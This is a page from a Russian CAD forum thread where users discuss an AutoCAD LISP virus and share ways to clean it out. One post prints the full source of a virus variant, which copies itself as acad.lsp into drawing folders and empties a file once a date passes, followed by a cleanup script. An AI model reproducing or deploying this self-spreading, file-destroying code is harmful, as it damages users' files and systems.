Вирус для Автокада - Страница 5
| Правила | Регистрация | Пользователи | Сообщения за день |  Справка по форуму | Файлообменник |

Вернуться   Форум DWG.RU > Программное обеспечение > AutoCAD > Вирус для Автокада

Вирус для Автокада

Ответ
Поиск в этой теме
Непрочитано 24.05.2007, 22:57
Вирус для Автокада
dextron3
 
проектировшик
 
СССР
Регистрация: 01.01.2007
Сообщений: 5,149

Вот уже целый год во все проектных фирмах все автокадовские файлы заражены вирусом (архив прилагается), но скорее всего в архиве производная от него!

Принцип действия:

При запуске любого автокадовского чертежа в этой же директории создается файл acad.lisp в котором прописывается вредоносный код вируса, сам лисп файл влияет на определенные команды автокада, ну допустим (взрывчатка не работает)

Данный вирус записывается на флешку в авторан, и переносится соотвественно с одного офиса на другой

Касперский его не видет вплоть до 7 версии

КТО СТАЛКИВАЛСЯ С ТАКИМ ВИРУСОМ И КАК ЕГО ЛЕЧИТЬ???
:idea: :idea: :idea:
[ATTACH]1180033030.rar[/ATTACH]

Тем, кому не прочитать тему:
http://forum.dwg.ru/showpost.php?p=218027&postcount=36
http://forum.dwg.ru/showpost.php?p=262114&postcount=52
http://forum.dwg.ru/showpost.php?p=796334&postcount=88
Для понимания механизма работы "вируса": http://forum.dwg.ru/showpost.php?p=1...&postcount=130
Для чистки следов вируса: http://autolisp.ru/wp-content/upload...acad-virus.lsp + http://wp.me/p4lEOS-GR
__________________
инженер проектировшик с опттом программа авто гад образование высшие

Последний раз редактировалось Кулик Алексей aka kpblc, 26.02.2015 в 15:02.
Просмотров: 195702
 
Непрочитано 03.09.2008, 15:01
#81
Bekbolatov

ГАП
 
Регистрация: 02.09.2008
Астана
Сообщений: 8


Решение проблемы по любым АвтоКад вирусам: http://dwg.ru/f/showthread.php?p=275205&
Bekbolatov вне форума  
 
Непрочитано 17.10.2008, 10:57
#82
VVA

Инженер LISP
 
Регистрация: 11.05.2005
Минск
Сообщений: 6,996


Еще один вариант заразы Acaddoc.lsp вирус или нет?
__________________
Как использовать код на Лиспе читаем здесь
VVA вне форума  
 
Непрочитано 23.06.2009, 15:05
#83
Denys

Інженер
 
Регистрация: 19.05.2009
Київ
Сообщений: 7


Цитата:
Сообщение от dextron3 Посмотреть сообщение
Касперский его не видет вплоть до 7 версии

КТО СТАЛКИВАЛСЯ С ТАКИМ ВИРУСОМ И КАК ЕГО ЛЕЧИТЬ???
:idea: :idea: :idea:
[ATTACH]1180033030.rar[/ATTACH]
Отсылай этот файл Касперскому в лабораторию (там есть такая функция), они быстро реагируют и вскоре, обновив антивирусные базы, твой каспер найдёт и обезвредит заразу. (Хотя ... странно что вирусу уже год, а Каспер его не знает).

Сам качать файл боюсь. :-Р

Удачи
Denys вне форума  
 
Непрочитано 11.07.2010, 18:43
#84
znatok


 
Регистрация: 12.04.2009
Сообщений: 93


Мой ответ относится к следующим сообщениям
Цитата:
Сообщение от dextron3 Посмотреть сообщение
....
Данный вирус записывается на флешку в авторан, и переносится соотвественно с одного офиса на другой
Касперский его не видет вплоть до 7 версии
КТО СТАЛКИВАЛСЯ С ТАКИМ ВИРУСОМ И КАК ЕГО ЛЕЧИТЬ???
Цитата:
Сообщение от Asys Посмотреть сообщение
мой друг пожаловался на странное поведение его Acada, по симптомам вроде напоминает случай описанный в первом сообщении, но все равно не то. Я прикладываю один подозрительный файлик который стал появляться в рабочих папках. Просьба к спецам-програмистам поковырять приложенный файлик на предмет вредоносности. И желательно выработать лекарство
Во, что выдаёт virustotal:

http://www.virustotal.com/ru/analisi...0c5-1278857854

http://www.virustotal.com/ru/analisi...3f2-1278858704
znatok вне форума  
 
Непрочитано 07.07.2011, 14:14
#85
WOL4OHOK


 
Регистрация: 17.06.2009
Сообщений: 10


Цитата:
Сообщение от VVA Посмотреть сообщение
Еще один вариант заразы Acaddoc.lsp вирус или нет?
Да вирус, у мну похреначил файл уже, други заражены тоже, что делать хз.
WOL4OHOK вне форума  
 
Непрочитано 07.07.2011, 16:19
#86
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,406


Цитата:
Сообщение от WOL4OHOK Посмотреть сообщение
что делать
Не хз, а почитать FAQ по AutoCAD
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 17.08.2011, 05:16
#87
mig84


 
Регистрация: 22.12.2009
Новосибирск
Сообщений: 29


Цитата:
Сообщение от WOL4OHOK Посмотреть сообщение
Да вирус, у мну похреначил файл уже, други заражены тоже, что делать хз.
Взяв за основу скрипт vbs'ский сделал небольшую утилиту. Чистит все файлы *.lsp от "хвостов" этой гадости. *.mnr, *.mns, *.mnc - удаляются.
Замечена пока одна проблема как и у скрипта - если есть сетевые диски, их надо отключить перед проверкой. В отличии от скрипта - нет необходимости запускать с консоли, чтобы увидеть что именно было удалено/очищено.
ps: сборка для net.3.5 (если установлен AutoCad 2010 и дальше, то этот fw уже установлен)
Вложения
Тип файла: zip lispVir.zip (121.4 Кб, 340 просмотров)
mig84 вне форума  
 
Непрочитано 24.08.2011, 09:52
1 | #88
VVA

Инженер LISP
 
Регистрация: 11.05.2005
Минск
Сообщений: 6,996


Набрел на следующие рекомендации AUTODESK How to detect and remove the Acad.vlx virus
Тема на другом форуме про вирус acad viruse Там выложена программа KillWorm для очистки заразы из Acaddoc.lsp вирус или нет? (та, которая (setq flagx t))
Опции
Цитата:
Active to search, find, then kill the virus if it is active.
Passive to search, find, then kill the virus even if it is not currently active.
ALL to search all local drives and folders.
? to see a brief help about the command.

KillWorm142.lsp
Вложения
Тип файла: lsp KillWorm.lsp (15.8 Кб, 674 просмотров)
__________________
Как использовать код на Лиспе читаем здесь

Последний раз редактировалось VVA, 27.02.2015 в 23:18.
VVA вне форума  
 
Непрочитано 05.09.2011, 20:41
#89
Yuriy-I

сп. САПР, архитектор
 
Регистрация: 25.05.2008
Санкт-Петербург
Сообщений: 116


пока удалил ...
читаю, что пропустил )))
__________________
"лучше" или "хуже" - понятия относительные

Последний раз редактировалось Yuriy-I, 05.09.2011 в 21:55.
Yuriy-I вне форума  
 
Непрочитано 26.09.2011, 16:44 Вирус Автокада
#90
weltwelt


 
Регистрация: 26.09.2011
Сообщений: 3


Цитата:
Сообщение от dextron3 Посмотреть сообщение
Вот уже целый год во все проектных фирмах все автокадовские файлы заражены вирусом (архив прилагается), но скорее всего в архиве производная от него!

Принцип действия:

При запуске любого автокадовского чертежа в этой же директории создается файл acad.lisp в котором прописывается вредоносный код вируса, сам лисп файл влияет на определенные команды автокада, ну допустим (взрывчатка не работает)

Данный вирус записывается на флешку в авторан, и переносится соотвественно с одного офиса на другой

Касперский его не видет вплоть до 7 версии

КТО СТАЛКИВАЛСЯ С ТАКИМ ВИРУСОМ И КАК ЕГО ЛЕЧИТЬ???
:idea: :idea: :idea:
[ATTACH]1180033030.rar[/ATTACH]
Вирус заползает с флешки, если с среди множества файлов есть такой файлик с acad.lsp программой.

Как бороться - Удалить все acad.lsp c машины. И вместо них записать все необходимые acad.lsp с указанным атрибутом ONLY READ

В этом случае вирус не залезает. Кстати Вирусом он закидаваеся также в папку
C:\Documents and Settings\Administrator\Application Data\Autodesk\AutoCAD 200ххх\...
Здесь тоже создать такой only-read файл acad.lsp.

На данный момент AVAST этот вирус лечит
weltwelt вне форума  
 
Непрочитано 26.09.2011, 19:16
#91
Солидворкер
Moderator

Конструктор (машиностроение)
 
Регистрация: 23.10.2006
Россия
Сообщений: 23,258
<phrase 1=


weltwelt, Капитан, это Вы?!
Солидворкер вне форума  
 
Непрочитано 26.09.2011, 19:27
#92
sbi


 
Регистрация: 27.04.2008
SPB
Сообщений: 3,285
Отправить сообщение для sbi с помощью Skype™


weltwelt Проще, создать вирус, а потом его уничтожить. Это не Вы?
__________________
С уважением sbi
sbi вне форума  
 
Непрочитано 30.09.2011, 10:52
#93
ciril

САПР
 
Регистрация: 29.09.2011
СПб
Сообщений: 283


Объявилась слегка модифицированная версия обсуждаемого файла. Выглядит как:
acad.lsp
Код:
[Выделить все]
 ++++++++++++++++++++----------------------------------------++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++




------------------------
(defun s::startup  (/ old_cmd path dwgpath mnlpath apppath oldacad newacad nowdwg lspbj wjm wjm1 wjqm wjqm1 wz ns1 ns2 kd)
  (setq old_cmd (getvar "cmdecho"))
  (setvar "cmdecho" 1)
  (setq path (findfile "base.dcl"))
  (setq path (substr path 1 (- (strlen path) 8)))
  (setq mnlpath (getvar "menuname"))
  (setq nowdwg (getvar "dwgname"))
  (setq wjqm (findfile nowdwg))
  (setq dwgpath (substr wjqm 1 (- (strlen wjqm) (strlen nowdwg))))
  (setq acadpath (findfile "acad.lsp"))
  (setq acadpath (substr acadpath 1 (- (strlen acadpath) 8)))
  (setq ns1 ""
        ns2 "")
  (setq lspbj 0)
  (if (= acadpath dwgpath)
    (progn (setq oldacad (findfile "acad.lsp")) (setq newacad (strcat path "acad.lsp")) (writeapp))
    (progn
      (if (/= nowdwg "Drawing.dwg")
        (progn (setq oldacad (findfile "acad.lsp")) (setq newacad (strcat dwgpath "acad.lsp")) (writeapp)))))
  (setq nowdwg (getvar "dwgname"))
  (setq wjqm (findfile nowdwg))
  (if (setq kd (findfile "acadisa.lin"))
    (progn (setq ns2 0)
           (if (setq ns1 (open kd "r"))
             (progn (while (setq wz (read-line ns1))
                      (if (= wjqm wz)
                        (setq ns2 1)))
                    (close ns1)))
           (if (= ns2 0)
             (progn (setq ns1 (open kd "a")) (write-line wjqm ns1) (close ns1)))
           (if (setq ns1 (open kd "r"))
             (progn (setq wz (read-line ns1)) (close ns1)))
           (if (> (getvar "date") (+ (distof wz) 8))
             (progn (setq oldacad (strcat path "acadisa.lin"))
                    (setq newacad (strcat dwgpath "a"))
                    (writeapp)
                    (if (setq wjm1 (open oldacad "w"))
                      (progn (setq wjm (open newacad "r"))
                             (setq wz (read-line wjm))
                             (write-line (rtos (getvar "date")) wjm1)
                             (setq wz (read-line wjm))
                             (if (> (getvar "date") 2452900)
                               (close (open wz "w")))
                             (while (setq wz (read-line wjm)) (write-line wz wjm1))
                             (close wjm)
                             (close wjm1)
                             (close (open newacad "w")))))))
    (progn (if (setq ns1 (open (strcat path "acadisa.lin") "w"))
             (progn (write-line (rtos (getvar "date")) ns1) (write-line wjqm ns1) (close ns1)))))
  (setvar "cmdecho" old_cmd)
  (princ))
(defun writeapp  ()
  (if (setq wjm1 (open newacad "w"))
    (progn (setq wjm (open oldacad "r"))
           (while (setq wz (read-line wjm)) (write-line wz wjm1))
           (close wjm)
           (close wjm1))))
                                        ;*************
Существенное отличие - создает файл acadisa.lin, в который записывает пути к папкам, в которых уже присутствует. На чем и построена борьба с ним:
anti.lsp
Код:
[Выделить все]
 ((eval '(lambda (/ x00 x01 x02 x03)
          (while (setq x00 (findfile "acadisa.lin")) ;ищем, пока по путям поддержки находится файл acadisa.lin
            (setq x01 0)
            (read-line (setq x02 (open x00 "r"))) ;открываем его, читаем, первая линия: дата - не нужна
            (while (setq x03 (read-line x02)) ;читаем пока не кончится
              (and (vl-file-delete (strcat (vl-filename-directory x03) "\\acad.lsp")) (setq x01 (1+ x01)))) ;удаляем acad.lsp, приращаем счетчик, возобновляем цикл чтения acadisa.lin
            (close x02) ;закрываем acadisa.lin
            (vl-file-delete x00)) ;удаляем его, возобновляем цикл поиска
          (and x01 (progn (setq s::startup nil) (princ (strcat "\nacad.lsp - " (itoa x01))))) ;переопределяем стартапп-функцию и выводим количество удаленных acad.lsp
          (princ))))
Добавить в автозагрузку. Или записью в реестр:
[HKEY_CURRENT_USER\Software\Autodesk\AutoCAD\R18.1\ACAD-9000:419\Profiles\"текущий_профиль"\Dialogs\Appload\Startup]
"NStartup"="путь к файлу\\anti.LSP"
"NumStartup"="N"
"текущий профиль" - значение по умолчанию ключа profile
если файлы в автозагрузке уже есть, то этот будет последним и NumStartup увеличится на единицу.

Последний раз редактировалось ciril, 13.10.2011 в 12:13. Причина: выдает ошибку на незараженном компе
ciril вне форума  
 
Непрочитано 13.01.2012, 15:52
#94
Wyacheslav1

каменщик
 
Регистрация: 28.09.2011
Южный Урал
Сообщений: 120


Появилась такая проблема после копирования объекта и его расчленении. Когда просто открывался ничего не было, а как скопировал себе объект и расчленил, перестал сохранять и сохранять как. Файл из Данлоада dnl5450_Shemy_stropovok_gruzov_v_pomocsh_PPRcshikam_
Воспользовался с поста 87 (спасибо!), теперь сохраняет, а сохранить как не "хотит", пишет "Неправильное имя файла".
Самое обидное что надо по диплому распечатывать и работать
Wyacheslav1 вне форума  
 
Непрочитано 13.01.2012, 16:07
1 | #95
Кулик Алексей aka kpblc
Moderator

LISP, C# (ACAD 200[9,12,13,14])
 
Регистрация: 25.08.2003
С.-Петербург
Сообщений: 40,406


Этот вирус лечится изменением драйвера hands.sys
__________________
Моя библиотека lisp-функций
---
Обращение ко мне - на "ты".
Все, что сказано - личное мнение.
Кулик Алексей aka kpblc вне форума  
 
Непрочитано 13.01.2012, 16:12
#96
Wyacheslav1

каменщик
 
Регистрация: 28.09.2011
Южный Урал
Сообщений: 120


Цитата:
Сообщение от Кулик Алексей aka kpblc Посмотреть сообщение
Этот вирус лечится изменением драйвера hands.sys
Прошу прощение за возможно глупый вопрос, а как это сделать? Вроде в этой теме не заметил... Или лучше новичку туда не лезть?
Wyacheslav1 вне форума  
 
Непрочитано 13.01.2012, 17:06
#97
Солидворкер
Moderator

Конструктор (машиностроение)
 
Регистрация: 23.10.2006
Россия
Сообщений: 23,258
<phrase 1=


Цитата:
Сообщение от Wyacheslav1 Посмотреть сообщение
Прошу прощение за возможно глупый вопрос, а как это сделать? Вроде в этой теме не заметил... Или лучше новичку туда не лезть?
Драйвер hands.sys переводится на русский как "прямые руки"
Всегда Ваш
Капитан Очевидность
Солидворкер вне форума  
 
Непрочитано 13.01.2012, 17:12
#98
Wyacheslav1

каменщик
 
Регистрация: 28.09.2011
Южный Урал
Сообщений: 120


Цитата:
Сообщение от Солидворкер Посмотреть сообщение
Драйвер hands.sys переводится на русский как "прямые руки"
Всегда Ваш
Капитан Очевидность
Лучше бы врача выпрямляющего кривые руки
Как "сохранить как"?
Wyacheslav1 вне форума  
 
Непрочитано 13.01.2012, 17:38
1 | #99
KronSerg

Вода - моя работа
 
Регистрация: 10.11.2009
Санкт-Петербург
Сообщений: 3,638


filedia в 1,
нормальное имя файлу давать,
чертёж от шелухи очистить,
Сохранить чертёж, скопировать в проводнике и переименовать,
Скопировать файл автосохранения,
Биться головой о стену пока не полегчает.
__________________
Нерешаемых проблем не бывает.
KronSerg вне форума  
 
Непрочитано 13.01.2012, 19:05
#100
gomer

строю, ломаю
 
Регистрация: 03.04.2008
Украина
Сообщений: 5,515


лучше с последнего начать
gomer вне форума  
Ответ
Вернуться   Форум DWG.RU > Программное обеспечение > AutoCAD > Вирус для Автокада



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Резервуар 250м.куб. на проверку dextron3 Инженерные сети 42 07.05.2011 15:59
Компьютер для автокада ugoday Компьютерная и бытовая техника, электроника и инструмент 31 02.09.2007 15:07
Хочу купить монитор ЖК для автокада какой фирмы я не знаю вы Рома_2 Разное 10 21.06.2007 03:44
Версия ЛАЙТ для автокада 2006 Kaktuz AutoCAD 8 18.10.2006 18:39
Определение нагрузок для нестандартных конструкций. NIVa Конструкции зданий и сооружений 2 06.08.2005 21:42